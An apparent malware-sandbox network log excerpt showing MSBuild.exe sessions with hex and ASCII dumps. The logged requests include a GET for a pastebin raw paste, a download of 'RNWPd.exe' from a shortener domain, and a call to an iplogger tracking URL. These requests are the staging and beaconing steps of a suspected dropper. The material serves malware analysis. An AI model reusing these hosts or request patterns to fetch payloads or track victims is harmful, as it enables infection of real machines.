2024-09-16 19:22:53 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:22:53 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:22:53 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:22:53 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:22:53 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:22:53 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:22:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	49776	104.20.4.235	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:22:58 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-09-16 19:22:58 UTC	222	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:22:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8c433a754b435e82-EWR
2024-09-16 19:22:58 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-16 19:22:58 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-09-16 19:22:58 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-09-16 19:22:58 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-09-16 19:22:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	49777	188.114.97.3	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:00 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-09-16 19:23:00 UTC	900	IN	HTTP/1.1 200 OK Date: Mon, 16 Sep 2024 19:23:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close memory: 0.36197662353515625 expires: Mon, 16 Sep 2024 19:23:00 +0000 strict-transport-security: max-age=604800 strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests x-frame-options: SAMEORIGIN Cache-Control: max-age=14400 CF-Cache-Status: EXPIRED Last-Modified: Mon, 16 Sep 2024 19:23:00 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5B3KCcEZMgXYMqNgzhtjn91LDOT078dsW7Ry532BRQlmtaBSggqYOGewjqtqZNVKmDo%2FzOYDYxhz9ZD4X2eQEY6Gkt%2Bf5bY9t%2FTjiAb5kHZwTpcyJGZkgI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c433a7e48e41927-EWR alt-svc: h3=":443"; ma=86400
2024-09-16 19:23:00 UTC	469	IN	Data Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
2024-09-16 19:23:00 UTC	1369	IN	Data Raw: 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 Data Ascii: ter" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta propert
2024-09-16 19:23:00 UTC	1369	IN	Data Raw: 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a Data Ascii: color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-delay:
2024-09-16 19:23:00 UTC	1369	IN	Data Raw: 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e 61 6d 65 29 Data Ascii: rAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(name)
2024-09-16 19:23:00 UTC	1369	IN	Data Raw: 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72 64 65 72 2d Data Ascii: style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;border-
2024-09-16 19:23:00 UTC	1369	IN	Data Raw: 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 Data Ascii: ;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div id="
2024-09-16 19:23:00 UTC	156	IN	Data Raw: 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: le.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
2024-09-16 19:23:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	49778	104.21.76.57	443	1340	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-16 19:23:05 UTC	68	OUT	GET /1djqU4 HTTP/1.1 Host: iplogger.com Connection: Keep-Alive
2024-09-16 19:23:05 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Mon, 16 Sep 2024 19:23:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-09-16 19:23:05 UTC	685	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 76 61 70 74 7a 57 4c 69 76 54 37 30 4a 4f 57 44 66 4e 68 64 4f 6b 33 4f 49 77 76 65 74 69 35 4c 70 4d 47 46 77 51 4d 4a 7a 6d 2b 6f 44 46 4a 76 36 4b 69 6d 4d 5a 69 7a 64 6b 6e 55 68 6c 38 6c 48 44 41 79 68 4d 41 5a 67 57 49 31 41 5a 32 6e 68 4c 68 6f 76 43 4e 59 63 76 6a 49 43 50 61 6f 57 6b 52 61 61 6b 49 56 32 32 73 3d 24 33 2f 76 6f 39 5a 65 42 5a 4d 72 35 63 49 34 5a 6a 54 6a 72 37 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: 